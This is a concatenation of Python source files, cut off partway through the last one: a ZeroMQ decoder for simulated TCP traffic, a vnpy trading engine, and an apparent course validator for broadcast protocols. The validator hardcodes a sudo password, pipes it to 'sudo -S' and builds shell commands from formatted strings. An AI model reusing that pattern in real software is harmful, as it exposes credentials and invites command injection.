source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
zmq_server.py |
import zmq
import struct
import ipaddress
import binascii
import threading
def reqrep_server(context):
socket = context.socket(zmq.REP)
socket.bind("tcp://*:5556")
while True:
try:
message = socket.recv()
print("Received request:" + str(message))
if message == b'ping':
socket.send(b"pong")
except zmq.ContextTerminated:
return
topic_tcpcontrol = "shadow_tcp_control".encode('ascii')
topic_tcpdata = "shadow_tcp_datastream".encode('ascii')
#topic = "fancyhw_data".encode('ascii')
print(f"Reading messages with topic: {topic_tcpcontrol}, {topic_tcpdata}")
with zmq.Context() as context:
# run req-rep server as separate thread
rep_th = threading.Thread(target=reqrep_server, args=(context,))
rep_th.start()
socket = context.socket(zmq.SUB)
socket.bind("tcp://*:5555")
socket.setsockopt(zmq.SUBSCRIBE, topic_tcpcontrol)
socket.setsockopt(zmq.SUBSCRIBE, topic_tcpdata)
i = 0
print("connect done")
try:
while True:
binary_topic, received_data = socket.recv().split(b' ', 1)
# topic_size = len("shadow_tcp_stream")
fd_size = 4
port_size = 2
addr_size = 4
time_size = 8
topic = binary_topic.decode(encoding='ascii')
if topic == "shadow_tcp_control":
binary_time = received_data[:time_size]
binary_fd = received_data[time_size:time_size+fd_size]
binary_from_addr = received_data[time_size+fd_size:time_size+fd_size+addr_size]
binary_port = received_data[time_size+fd_size+addr_size:time_size+fd_size+addr_size+port_size]
binary_addr = received_data[time_size+fd_size+addr_size+port_size:]
print("Message {:d}:".format(i))
time = struct.unpack("Q", binary_time)[0]
time = time / 1000000000.0
fd = struct.unpack("i", binary_fd)[0]
from_addr = struct.unpack("!I", binary_from_addr)[0]
from_addr = str(ipaddress.ip_address(from_addr))
port = struct.unpack("!H", binary_port)[0]
addr = struct.unpack("!I", binary_addr)[0]
addr = str(ipaddress.ip_address(addr))
print(f'[{time}] topic:{topic.split("shadow_")[1]}, fd:{fd}, {from_addr}-->{addr}:{port} (TCP connection)')
elif topic == "shadow_tcp_datastream_send":
binary_time = received_data[:time_size]
binary_fd = received_data[time_size:time_size+fd_size]
binary_from_port = received_data[time_size+fd_size:time_size+fd_size+port_size]
binary_from_addr = received_data[time_size+fd_size+port_size:time_size+fd_size+port_size+addr_size]
binary_peer_port = received_data[time_size+fd_size+port_size+addr_size:time_size+fd_size+port_size+addr_size+port_size]
binary_peer_addr = received_data[time_size+fd_size+port_size+addr_size+port_size:time_size+fd_size + port_size + addr_size + port_size+addr_size]
binary_buf = received_data[time_size+fd_size + port_size + addr_size + port_size+addr_size:]
time = struct.unpack("Q", binary_time)[0]
time = time / 1000000000.0
fd = struct.unpack("i", binary_fd)[0]
buf = binascii.hexlify(binary_buf)
from_port = struct.unpack("!H", binary_from_port)[0]
from_addr = struct.unpack("!I", binary_from_addr)[0]
from_addr = str(ipaddress.ip_address(from_addr))
peer_port = struct.unpack("!H", binary_peer_port)[0]
peer_addr = struct.unpack("!I", binary_peer_addr)[0]
peer_addr = str(ipaddress.ip_address(peer_addr))
print(f'[{time}] topic:{topic.split("shadow_")[1]}, fd:{fd}, {from_addr}:{from_port}-->{peer_addr}:{peer_port}, buf:[{buf}]\n\t\t\tbufstr:[{binary_buf}]')
elif topic == "shadow_tcp_datastream_recv":
binary_time = received_data[:time_size]
binary_fd = received_data[time_size:time_size+fd_size]
binary_myport = received_data[time_size+fd_size:time_size+fd_size+port_size]
binary_myaddr = received_data[time_size+fd_size+port_size:time_size+fd_size+port_size+addr_size]
binary_buf = received_data[time_size+fd_size+port_size+addr_size:]
time = struct.unpack("Q", binary_time)[0]
time = time / 1000000000.0
fd = struct.unpack("i", binary_fd)[0]
buf = binascii.hexlify(binary_buf)
myport = struct.unpack("!H", binary_myport)[0]
myaddr = struct.unpack("!I", binary_myaddr)[0]
myaddr = str(ipaddress.ip_address(myaddr))
print(f'[{time}] topic:{topic.split("shadow_")[1]}, fd:{fd}, -->{myaddr}:{myport}, buf:[{buf}]')
i += 1
except KeyboardInterrupt:
socket.close()
except Exception as error:
print("ERROR: {}".format(error))
socket.close()
finally:
context.term()
|
engine.py | """
"""
import logging
from logging import Logger
import smtplib
import os
import sys
from abc import ABC
from datetime import datetime
from email.message import EmailMessage
from queue import Empty, Queue
from threading import Thread
from typing import Any, Sequence, Type, Dict, List, Optional
from vnpy.event import Event, EventEngine
from .app import BaseApp
from .event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION,
EVENT_ACCOUNT,
EVENT_CONTRACT,
EVENT_LOG
)
from .gateway import BaseGateway
from .object import (
Direction,
Exchange,
CancelRequest,
LogData,
OrderRequest,
SubscribeRequest,
HistoryRequest,
OrderData,
BarData,
TickData,
TradeData,
PositionData,
AccountData,
ContractData
)
from .setting import SETTINGS
from .utility import get_folder_path, TRADER_DIR
# 专有的logger文件
from .util_logger import setup_logger
class MainEngine:
"""
Acts as the core of VN Trader.
"""
def __init__(self, event_engine: EventEngine = None):
""""""
if event_engine:
self.event_engine: EventEngine = event_engine
else:
self.event_engine = EventEngine()
self.event_engine.start()
self.gateways: Dict[str, BaseGateway] = {}
self.engines: Dict[str, BaseEngine] = {}
self.apps: Dict[str, BaseApp] = {}
self.exchanges: List[Exchange] = []
self.rm_engine = None
self.algo_engine = None
self.rpc_service = None
os.chdir(TRADER_DIR) # Change working directory
self.init_engines() # Initialize function engines
def add_engine(self, engine_class: Any) -> "BaseEngine":
"""
Add function engine.
"""
engine = engine_class(self, self.event_engine)
self.engines[engine.engine_name] = engine
return engine
def add_gateway(self, gateway_class: Type[BaseGateway], gateway_name: str = None) -> BaseGateway:
"""
Add gateway.
"""
if gateway_name:
# 使用指定的gateway_name, 可以区分相同接口不同账号的gateway同时接入
gateway = gateway_class(self.event_engine, gateway_name=gateway_name)
else:
# 缺省使用了接口自己定义的gateway_name
gateway = gateway_class(self.event_engine)
gateway_name = gateway.gateway_name
self.write_log(f'添加{gateway_name}网关')
self.gateways[gateway_name] = gateway
# Add gateway supported exchanges into engine
for exchange in gateway.exchanges:
if exchange not in self.exchanges:
self.exchanges.append(exchange)
return gateway
def add_app(self, app_class: Type[BaseApp]) -> "BaseEngine":
"""
Add app.
"""
app = app_class()
self.apps[app.app_name] = app
engine = self.add_engine(app.engine_class)
if app.app_name == "RiskManager":
self.rm_engine = engine
elif app.app_name == "AlgoTrading":
self.algo_engine = engine
elif app.app_name == 'RpcService':
self.rpc_service = engine
return engine
def init_engines(self) -> None:
"""
Init all engines.
"""
self.add_engine(LogEngine)
self.add_engine(OmsEngine)
self.add_engine(EmailEngine)
def write_log(self, msg: str, source: str = "") -> None:
"""
Put log event with specific message.
"""
log = LogData(msg=msg, gateway_name=source)
event = Event(EVENT_LOG, log)
self.event_engine.put(event)
def write_error(self, msg: str, source: str = "") -> None:
"""
Put log event with specific message.
"""
log = LogData(msg=msg, gateway_name=source)
event = Event(EVENT_LOG, log)
self.event_engine.put(event)
print(msg, file=sys.stderr)
def get_gateway(self, gateway_name: str) -> BaseGateway:
"""
Return gateway object by name.
"""
gateway = self.gateways.get(gateway_name, None)
if not gateway:
self.write_error(f"找不到底层接口:{gateway_name}")
return gateway
def get_engine(self, engine_name: str) -> "BaseEngine":
"""
Return engine object by name.
"""
engine = self.engines.get(engine_name, None)
if not engine:
self.write_error(f"找不到引擎:{engine_name}")
return engine
def get_default_setting(self, gateway_name: str) -> Optional[Dict[str, Any]]:
"""
Get default setting dict of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.get_default_setting()
else:
self.write_error(f'获取网格设置时,找不到{gateway_name}')
return None
def get_all_gateway_names(self) -> List[str]:
"""
Get all names of gatewasy added in main engine.
"""
return list(self.gateways.keys())
def get_all_gateway_status(self) -> List[dict]:
"""
Get all gateway status
:return:
"""
return list([{k: v.get_status()} for k, v in self.gateways.items()])
def get_all_apps(self) -> List[BaseApp]:
"""
Get all app objects.
"""
return list(self.apps.values())
def get_all_exchanges(self) -> List[Exchange]:
"""
Get all exchanges.
"""
return self.exchanges
def connect(self, setting: dict, gateway_name: str) -> None:
"""
Start connection of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
try:
gateway.connect(setting)
except Exception as ex:
msg = f'gateway:{gateway_name}启动连接失败:{str(ex)}'
self.write_log(msg=msg)
else:
self.write_error(f'连接{gateway_name}时,系统找不到{gateway_name}')
def subscribe(self, req: SubscribeRequest, gateway_name: str) -> None:
"""
Subscribe tick data update of a specific gateway.
如果没有指定gateway,那么所有的gateway都会接收改订阅请求
"""
if gateway_name:
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.subscribe(req)
else:
self.write_error(f'订阅合约时,找不到{gateway_name}')
else:
for gateway in self.gateways.values():
if gateway:
gateway.subscribe(req)
def send_order(self, req: OrderRequest, gateway_name: str) -> str:
"""
Send new order request to a specific gateway.
扩展支持自定义套利合约。 由cta_strategy_pro发出算法单委托,由算法引擎进行处理
"""
# 自定义套利合约,交给算法引擎处理
if self.algo_engine and req.exchange == Exchange.SPD:
return self.algo_engine.send_spd_order(
req=req,
gateway_name=gateway_name)
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_order(req)
else:
self.write_error(f'发送委托时,找不到{gateway_name}')
return ""
def cancel_order(self, req: CancelRequest, gateway_name: str) -> bool:
"""
Send cancel order request to a specific gateway.
"""
# 自定义套利合约,交给算法引擎处理
if self.algo_engine and req.exchange == Exchange.SPD:
return self.algo_engine.cancel_spd_order(
req=req)
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.cancel_order(req)
else:
self.write_error(f'撤单时,找不到{gateway_name}')
return False
def send_orders(self, reqs: Sequence[OrderRequest], gateway_name: str) -> List[str]:
"""
批量发单
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_orders(reqs)
else:
self.write_error(f'批量发单时,找不到{gateway_name}')
return ["" for req in reqs]
def cancel_orders(self, reqs: Sequence[CancelRequest], gateway_name: str) -> None:
"""
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_orders(reqs)
else:
self.write_error(f'批量撤单时,找不到{gateway_name}')
def query_history(self, req: HistoryRequest, gateway_name: str) -> Optional[List[BarData]]:
"""
Send cancel order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.query_history(req)
else:
self.write_error(f'找不到网关{gateway_name},请检查合约得网关是否与连接得网关一致')
return None
def close(self) -> None:
"""
Make sure every gateway and app is closed properly before
programme exit.
"""
if hasattr(self, 'save_contracts'):
self.save_contracts()
# Stop event engine first to prevent new timer event.
self.event_engine.stop()
for engine in self.engines.values():
engine.close()
for gateway in self.gateways.values():
gateway.close()
class BaseEngine(ABC):
"""
Abstract class for implementing an function engine.
"""
def __init__(
self,
main_engine: MainEngine,
event_engine: EventEngine,
engine_name: str,
):
""""""
self.main_engine = main_engine
self.event_engine = event_engine
self.engine_name = engine_name
self.logger = None
self.create_logger(engine_name)
def create_logger(self, logger_name: str = 'base_engine'):
"""
创建engine独有的日志
:param logger_name: 日志名,缺省为engine的名称
:return:
"""
log_path = get_folder_path("log")
log_filename = str(log_path.joinpath(logger_name))
print(u'create logger:{}'.format(log_filename))
self.logger = setup_logger(file_name=log_filename, name=logger_name,
log_level=SETTINGS.get('log.level', logging.DEBUG))
def write_log(self, msg: str, source: str = "", level: int = logging.DEBUG):
"""
写入日志
:param msg: 日志内容
:param source: 来源
:param level: 日志级别
:return:
"""
if self.logger:
if len(source) > 0:
msg = f'[{source}]{msg}'
self.logger.log(level, msg)
else:
log = LogData(msg=msg, level=level, gateway_name='')
event = Event(EVENT_LOG, log)
self.event_engine.put(event)
def close(self):
""""""
pass
class LogEngine(BaseEngine):
"""
Processes log event and output with logging module.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(LogEngine, self).__init__(main_engine, event_engine, "log")
if not SETTINGS["log.active"]:
return
self.level: int = SETTINGS["log.level"]
self.logger: Logger = logging.getLogger("VN Trader")
self.logger.setLevel(self.level)
self.formatter = logging.Formatter(
"%(asctime)s %(levelname)s: %(message)s"
)
self.add_null_handler()
if SETTINGS["log.console"]:
self.add_console_handler()
if SETTINGS["log.file"]:
self.add_file_handler()
self.register_event()
def add_null_handler(self) -> None:
"""
Add null handler for logger.
"""
null_handler = logging.NullHandler()
self.logger.addHandler(null_handler)
def add_console_handler(self) -> None:
"""
Add console output of log.
"""
console_handler = logging.StreamHandler()
console_handler.setLevel(self.level)
console_handler.setFormatter(self.formatter)
self.logger.addHandler(console_handler)
def add_file_handler(self) -> None:
"""
Add file output of log.
"""
today_date = datetime.now().strftime("%Y%m%d")
filename = f"vt_{today_date}.log"
log_path = get_folder_path("log")
file_path = log_path.joinpath(filename)
file_handler = logging.FileHandler(
file_path, mode="a", encoding="utf8"
)
file_handler.setLevel(self.level)
file_handler.setFormatter(self.formatter)
self.logger.addHandler(file_handler)
def register_event(self) -> None:
""""""
self.event_engine.register(EVENT_LOG, self.process_log_event)
def process_log_event(self, event: Event) -> None:
"""
Process log event.
"""
log = event.data
self.logger.log(log.level, log.msg)
class OmsEngine(BaseEngine):
"""
Provides order management system function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(OmsEngine, self).__init__(main_engine, event_engine, "oms")
self.ticks: Dict[str, TickData] = {}
self.orders: Dict[str, OrderData] = {}
self.trades: Dict[str, TradeData] = {}
self.positions: Dict[str, PositionData] = {}
self.accounts: Dict[str, AccountData] = {}
self.contracts: Dict[str, ContractData] = {}
self.today_contracts: Dict[str, ContractData] = {}
# 自定义合约
self.custom_contracts = {} # vt_symbol: ContractData
self.custom_settings = {} # symbol: dict
self.symbol_spd_maping = {} # symbol: [spd_symbol]
self.prices = {}
self.active_orders: Dict[str, OrderData] = {}
self.add_function()
self.register_event()
self.load_contracts()
def __del__(self):
"""保存缓存"""
self.save_contracts()
def load_contracts(self) -> None:
"""从本地缓存加载合约字典"""
import bz2
import pickle
contract_file_name = 'vn_contract.pkb2'
if os.path.exists(contract_file_name):
try:
with bz2.BZ2File(contract_file_name, 'rb') as f:
self.contracts = pickle.load(f)
self.write_log(f'加载缓存合约字典:{contract_file_name}')
except Exception as ex:
self.write_log(f'加载缓存合约异常:{str(ex)}')
# 更新自定义合约
custom_contracts = self.get_all_custom_contracts()
self.get_all_custom_contracts(rtn_setting=True)
for contract in custom_contracts.values():
# 更新合约缓存
self.contracts.update({contract.symbol: contract})
self.contracts.update({contract.vt_symbol: contract})
self.today_contracts[contract.vt_symbol] = contract
self.today_contracts[contract.symbol] = contract
# 获取自定义合约的主动腿/被动腿
setting = self.custom_settings.get(contract.symbol, {})
leg1_symbol = setting.get('leg1_symbol')
leg2_symbol = setting.get('leg2_symbol')
# 构建映射关系
for symbol in [leg1_symbol, leg2_symbol]:
spd_mapping_list = self.symbol_spd_maping.get(symbol, [])
# 更新映射 symbol => spd_symbol
if (not contract.symbol.endswith('.SPD')) and contract.symbol not in spd_mapping_list:
spd_mapping_list.append(contract.symbol)
self.symbol_spd_maping.update({symbol: spd_mapping_list})
def save_contracts(self) -> None:
"""持久化合约对象到缓存文件"""
import bz2
import pickle
contract_file_name = 'vn_contract.pkb2'
with bz2.BZ2File(contract_file_name, 'wb') as f:
if len(self.today_contracts) > 0:
self.write_log(f'保存今日合约对象到缓存文件')
pickle.dump(self.today_contracts, f)
else:
pickle.dump(self.contracts, f)
def add_function(self) -> None:
"""Add query function to main engine."""
self.main_engine.get_tick = self.get_tick
self.main_engine.get_order = self.get_order
self.main_engine.get_price = self.get_price
self.main_engine.get_trade = self.get_trade
self.main_engine.get_position = self.get_position
self.main_engine.get_account = self.get_account
self.main_engine.get_contract = self.get_contract
self.main_engine.get_exchange = self.get_exchange
self.main_engine.get_custom_contract = self.get_custom_contract
self.main_engine.get_all_ticks = self.get_all_ticks
self.main_engine.get_all_orders = self.get_all_orders
self.main_engine.get_all_trades = self.get_all_trades
self.main_engine.get_all_positions = self.get_all_positions
self.main_engine.get_all_accounts = self.get_all_accounts
self.main_engine.get_all_contracts = self.get_all_contracts
self.main_engine.get_all_active_orders = self.get_all_active_orders
self.main_engine.get_all_custom_contracts = self.get_all_custom_contracts
self.main_engine.get_mapping_spd = self.get_mapping_spd
self.main_engine.save_contracts = self.save_contracts
def register_event(self) -> None:
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_ORDER, self.process_order_event)
self.event_engine.register(EVENT_TRADE, self.process_trade_event)
self.event_engine.register(EVENT_POSITION, self.process_position_event)
self.event_engine.register(EVENT_ACCOUNT, self.process_account_event)
self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)
def process_tick_event(self, event: Event) -> None:
""""""
tick = event.data
self.ticks[tick.vt_symbol] = tick
if '&' not in tick.symbol and tick.last_price:
self.prices[tick.vt_symbol] = tick.last_price
def process_order_event(self, event: Event) -> None:
""""""
order = event.data
self.orders[order.vt_orderid] = order
# If order is active, then update data in dict.
if order.is_active():
self.active_orders[order.vt_orderid] = order
# Otherwise, pop inactive order from in dict
elif order.vt_orderid in self.active_orders:
self.active_orders.pop(order.vt_orderid)
def process_trade_event(self, event: Event) -> None:
""""""
trade = event.data
self.trades[trade.vt_tradeid] = trade
def process_position_event(self, event: Event) -> None:
""""""
position = event.data
self.positions[position.vt_positionid] = position
if position.exchange != Exchange.SPD:
self.create_spd_position_event(position.symbol, position.direction)
def reverse_direction(self, direction):
"""返回反向持仓"""
if direction == Direction.LONG:
return Direction.SHORT
elif direction == Direction.SHORT:
return Direction.LONG
return direction
def create_spd_position_event(self, symbol, direction):
"""创建自定义品种对持仓信息"""
spd_symbols = self.symbol_spd_maping.get(symbol, [])
if not spd_symbols:
return
for spd_symbol in spd_symbols:
spd_setting = self.custom_settings.get(spd_symbol, None)
if not spd_setting:
continue
leg1_symbol = spd_setting.get('leg1_symbol')
leg2_symbol = spd_setting.get('leg2_symbol')
leg1_contract = self.contracts.get(leg1_symbol)
leg2_contract = self.contracts.get(leg2_symbol)
spd_contract = self.contracts.get(spd_symbol)
if leg1_contract is None or leg2_contract is None:
continue
leg1_ratio = spd_setting.get('leg1_ratio', 1)
leg2_ratio = spd_setting.get('leg2_ratio', 1)
# 找出leg1,leg2的持仓,并判断出spd的方向
spd_pos = None
if leg1_symbol == symbol:
k1 = f"{leg1_contract.gateway_name}.{leg1_contract.vt_symbol}.{direction.value}"
leg1_pos = self.positions.get(k1)
k2 = f"{leg2_contract.gateway_name}.{leg2_contract.vt_symbol}.{self.reverse_direction(direction).value}"
leg2_pos = self.positions.get(k2)
spd_direction = direction
k3 = f"{spd_contract.gateway_name}.{spd_symbol}.{Exchange.SPD.value}.{spd_direction.value}"
spd_pos = self.positions.get(k3)
elif leg2_symbol == symbol:
k1 = f"{leg1_contract.gateway_name}.{leg1_contract.vt_symbol}.{self.reverse_direction(direction).value}"
leg1_pos = self.positions.get(k1)
k2 = f"{leg2_contract.gateway_name}.{leg2_contract.vt_symbol}.{direction.value}"
leg2_pos = self.positions.get(k2)
spd_direction = self.reverse_direction(direction)
k3 = f"{spd_contract.gateway_name}.{spd_symbol}.{Exchange.SPD.value}.{spd_direction.value}"
spd_pos = self.positions.get(k3)
else:
continue
if leg1_pos is None or leg2_pos is None: # or leg1_pos.volume ==0 or leg2_pos.volume == 0:
continue
# 根据leg1/leg2的volume ratio,计算出最小spd_volume
spd_volume = min(int(leg1_pos.volume / leg1_ratio), int(leg2_pos.volume / leg2_ratio))
if spd_volume <= 0 and spd_pos is None:
continue
if spd_setting.get('is_ratio', False) and leg2_pos.price > 0:
spd_price = 100 * (leg2_pos.price * leg1_ratio) / (leg2_pos.price * leg2_ratio)
elif spd_setting.get('is_spread', False):
spd_price = leg1_pos.price * leg1_ratio - leg2_pos.price * leg2_ratio
else:
spd_price = 0
spd_pos = PositionData(
gateway_name=spd_contract.gateway_name,
accountid=leg1_pos.accountid,
symbol=spd_symbol,
exchange=Exchange.SPD,
direction=spd_direction,
volume=spd_volume,
price=spd_price
)
event = Event(EVENT_POSITION, data=spd_pos)
self.event_engine.put(event)
def process_account_event(self, event: Event) -> None:
""""""
account = event.data
self.accounts[account.vt_accountid] = account
def process_contract_event(self, event: Event) -> None:
""""""
contract = event.data
self.contracts[contract.vt_symbol] = contract
self.contracts[contract.symbol] = contract
self.today_contracts[contract.vt_symbol] = contract
self.today_contracts[contract.symbol] = contract
def get_exchange(self, symbol: str) -> Exchange:
"""获取合约对应的交易所"""
contract = self.contracts.get(symbol, None)
if contract is None:
return Exchange.LOCAL
return contract.exchange
def get_tick(self, vt_symbol: str) -> Optional[TickData]:
"""
Get latest market tick data by vt_symbol.
"""
return self.ticks.get(vt_symbol, None)
def get_price(self, vt_symbol):
"""
get the lastest price by vt_symbol
:param vt_symbol:
:return:
"""
return self.prices.get(vt_symbol, None)
def get_order(self, vt_orderid) -> Optional[OrderData]:
"""
Get latest order data by vt_orderid.
"""
return self.orders.get(vt_orderid, None)
def get_trade(self, vt_tradeid: str) -> Optional[TradeData]:
"""
Get trade data by vt_tradeid.
"""
return self.trades.get(vt_tradeid, None)
def get_position(self, vt_positionid: str) -> Optional[PositionData]:
"""
Get latest position data by vt_positionid.
"""
return self.positions.get(vt_positionid, None)
def get_account(self, vt_accountid: str) -> Optional[AccountData]:
"""
Get latest account data by vt_accountid.
"""
return self.accounts.get(vt_accountid, None)
def get_contract(self, vt_symbol: str) -> Optional[ContractData]:
"""
Get contract data by vt_symbol.
"""
return self.contracts.get(vt_symbol, None)
def get_all_ticks(self) -> List[TickData]:
"""
Get all tick data.
"""
return list(self.ticks.values())
def get_all_orders(self) -> List[OrderData]:
"""
Get all order data.
"""
return list(self.orders.values())
def get_all_trades(self) -> List[TradeData]:
"""
Get all trade data.
"""
return list(self.trades.values())
def get_all_positions(self) -> List[PositionData]:
"""
Get all position data.
"""
return list(self.positions.values())
def get_all_accounts(self) -> List[AccountData]:
"""
Get all account data.
"""
return list(self.accounts.values())
def get_all_contracts(self) -> List[ContractData]:
"""
Get all contract data.
"""
return list(self.contracts.values())
def get_all_active_orders(self, vt_symbol: str = "") -> List[OrderData]:
"""
Get all active orders by vt_symbol.
If vt_symbol is empty, return all active orders.
"""
if not vt_symbol:
return list(self.active_orders.values())
else:
active_orders = [
order
for order in self.active_orders.values()
if order.vt_symbol == vt_symbol
]
return active_orders
def get_custom_contract(self, symbol):
"""
获取自定义合约的设置
:param symbol: "pb2012-1-pb2101-1-CJ"
:return: {
"name": "pb跨期价差",
"exchange": "SPD",
"leg1_symbol": "pb2012",
"leg1_exchange": "SHFE",
"leg1_ratio": 1,
"leg2_symbol": "pb2101",
"leg2_exchange": "SHFE",
"leg2_ratio": 1,
"is_spread": true,
"size": 1,
"margin_rate": 0.1,
"price_tick": 5
}
"""
return self.custom_settings.get(symbol, None)
def get_all_custom_contracts(self, rtn_setting=False):
"""
获取所有自定义合约
:return:
"""
if rtn_setting:
if len(self.custom_settings) == 0:
c = CustomContract()
self.custom_settings = c.get_config()
return self.custom_settings
if len(self.custom_contracts) == 0:
c = CustomContract()
self.custom_settings = c.get_config()
self.custom_contracts = c.get_contracts()
return self.custom_contracts
def get_mapping_spd(self, symbol):
"""根据主动腿/被动腿symbol,获取自定义套利对的symbol list"""
return self.symbol_spd_maping.get(symbol, [])
class CustomContract(object):
"""
定制合约
# 适用于初始化系统时,补充到本地合约信息文件中 contracts.vt
# 适用于CTP网关,加载自定义的套利合约,做内部行情撮合
"""
# 运行本地目录下,定制合约的配置文件(dict)
file_name = 'custom_contracts.json'
def __init__(self):
"""构造函数"""
from vnpy.trader.utility import load_json
self.setting = load_json(self.file_name) # 所有设置
def get_config(self):
"""获取配置"""
return self.setting
def get_contracts(self):
"""获取所有合约信息"""
d = {}
from vnpy.trader.object import ContractData, Exchange
for symbol, setting in self.setting.items():
gateway_name = setting.get('gateway_name', None)
if gateway_name is None:
gateway_name = SETTINGS.get('gateway_name', '')
vn_exchange = Exchange(setting.get('exchange', 'SPD'))
contract = ContractData(
gateway_name=gateway_name,
symbol=symbol,
exchange=vn_exchange,
name=setting.get('name', symbol),
size=setting.get('size', 100),
product=None,
pricetick=setting.get('price_tick', 0.01),
margin_rate=setting.get('margin_rate', 0.1)
)
d[contract.vt_symbol] = contract
return d
class EmailEngine(BaseEngine):
"""
Provides email sending function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(EmailEngine, self).__init__(main_engine, event_engine, "email")
self.thread: Thread = Thread(target=self.run)
self.queue: Queue = Queue()
self.active: bool = False
self.main_engine.send_email = self.send_email
def send_email(self, subject: str, content: str, receiver: str = "") -> None:
""""""
# Start email engine when sending first email.
if not self.active:
self.start()
# Use default receiver if not specified.
if not receiver:
receiver = SETTINGS["email.receiver"]
msg = EmailMessage()
msg["From"] = SETTINGS["email.sender"]
msg["To"] = receiver
msg["Subject"] = subject
msg.set_content(content)
self.queue.put(msg)
def run(self) -> None:
""""""
while self.active:
try:
msg = self.queue.get(block=True, timeout=1)
with smtplib.SMTP_SSL(
SETTINGS["email.server"], SETTINGS["email.port"]
) as smtp:
smtp.login(
SETTINGS["email.username"], SETTINGS["email.password"]
)
smtp.send_message(msg)
except Empty:
pass
def start(self) -> None:
""""""
self.active = True
self.thread.start()
def close(self) -> None:
""""""
if not self.active:
return
self.active = False
self.thread.join()
|
validate.py | #!/usr/bin/env python3
import argparse
import os, atexit
import textwrap
import time
import tempfile
import threading, subprocess
import barrier, finishedSignal
import signal
import random
import time
from enum import Enum
from collections import defaultdict, OrderedDict
BARRIER_IP = "localhost"
BARRIER_PORT = 10000
SIGNAL_IP = "localhost"
SIGNAL_PORT = 11000
PROCESSES_BASE_IP = 11000
# Do not run multiple validations concurrently!
class TC:
def __init__(self, losses, interface="lo", needSudo=True, sudoPassword="dcl"):
self.losses = losses
self.interface = interface
self.needSudo = needSudo
self.sudoPassword = sudoPassword
cmd1 = "tc qdisc add dev {} root netem 2>/dev/null".format(self.interface)
cmd2 = "tc qdisc change dev {} root netem delay {} {} distribution normal loss {} {} reorder {} {}".format(
self.interface,
*self.losses["delay"],
*self.losses["loss"],
*self.losses["reordering"]
)
if self.needSudo:
os.system("echo {} | sudo -S {}".format(self.sudoPassword, cmd1))
os.system("echo {} | sudo -S {}".format(self.sudoPassword, cmd2))
else:
os.system(cmd1)
os.system(cmd2)
atexit.register(self.cleanup)
def __str__(self):
ret = """\
Interface: {}
Distribution: Normal
Delay: {} {}
Loss: {} {}
Reordering: {} {}""".format(
self.interface,
*self.losses["delay"],
*self.losses["loss"],
*self.losses["reordering"]
)
return textwrap.dedent(ret)
def cleanup(self):
cmd = "tc qdisc del dev {} root 2>/dev/null".format(self.interface)
if self.needSudo:
os.system("echo '{}' | sudo -S {}".format(self.sudoPassword, cmd))
else:
os.system(cmd)
class ProcessState(Enum):
RUNNING = 1
STOPPED = 2
TERMINATED = 3
class ProcessInfo:
def __init__(self, handle):
self.lock = threading.Lock()
self.handle = handle
self.state = ProcessState.RUNNING
@staticmethod
def stateToSignal(state):
if state == ProcessState.RUNNING:
return signal.SIGCONT
if state == ProcessState.STOPPED:
return signal.SIGSTOP
if state == ProcessState.TERMINATED:
return signal.SIGTERM
@staticmethod
def stateToSignalStr(state):
if state == ProcessState.RUNNING:
return "SIGCONT"
if state == ProcessState.STOPPED:
return "SIGSTOP"
if state == ProcessState.TERMINATED:
return "SIGTERM"
@staticmethod
def validStateTransition(current, desired):
if current == ProcessState.TERMINATED:
return False
if current == ProcessState.RUNNING:
return desired == ProcessState.STOPPED or desired == ProcessState.TERMINATED
if current == ProcessState.STOPPED:
return desired == ProcessState.RUNNING
return False
class AtomicSaturatedCounter:
def __init__(self, saturation, initial=0):
self._saturation = saturation
self._value = initial
self._lock = threading.Lock()
def reserve(self):
with self._lock:
if self._value < self._saturation:
self._value += 1
return True
else:
return False
class Validation:
def __init__(self, processes, messages, outputDir):
self.processes = processes
self.messages = messages
self.outputDirPath = os.path.abspath(outputDir)
if not os.path.isdir(self.outputDirPath):
raise Exception("`{}` is not a directory".format(self.outputDirPath))
def generateConfig(self):
# Implement on the derived classes
pass
def checkProcess(self, pid):
# Implement on the derived classes
pass
def checkAll(self, continueOnError=True):
ok = True
for pid in range(1, self.processes + 1):
ret = self.checkProcess(pid)
if not ret:
ok = False
if not ret and not continueOnError:
return False
return ok
class FifoBroadcastValidation(Validation):
def generateConfig(self):
hosts = tempfile.NamedTemporaryFile(mode="w")
config = tempfile.NamedTemporaryFile(mode="w")
for i in range(1, self.processes + 1):
hosts.write("{} localhost {}\n".format(i, PROCESSES_BASE_IP + i))
hosts.flush()
config.write("{}\n".format(self.messages))
config.flush()
return (hosts, config)
def checkProcess(self, pid):
filePath = os.path.join(self.outputDirPath, "proc{:02d}.output".format(pid))
i = 1
nextMessage = defaultdict(lambda: 1)
filename = os.path.basename(filePath)
with open(filePath) as f:
for lineNumber, line in enumerate(f):
tokens = line.split()
# Check broadcast
if tokens[0] == "b":
msg = int(tokens[1])
if msg != i:
print(
"File {}, Line {}: Messages broadcast out of order. Expected message {} but broadcast message {}".format(
filename, lineNumber, i, msg
)
)
return False
i += 1
# Check delivery
if tokens[0] == "d":
sender = int(tokens[1])
msg = int(tokens[2])
if msg != nextMessage[sender]:
print(
"File {}, Line {}: Message delivered out of order. Expected message {}, but delivered message {}".format(
filename, lineNumber, nextMessage[sender], msg
)
)
return False
else:
nextMessage[sender] = msg + 1
return True
class LCausalBroadcastValidation(Validation):
def __init__(self, processes, messages, outputDir, extraParameter):
super().__init__(processes, messages, outputDir)
self.dependencies = defaultdict(list, extraParameter)
def generateConfig(self):
hosts = tempfile.NamedTemporaryFile(mode="w")
config = tempfile.NamedTemporaryFile(mode="w")
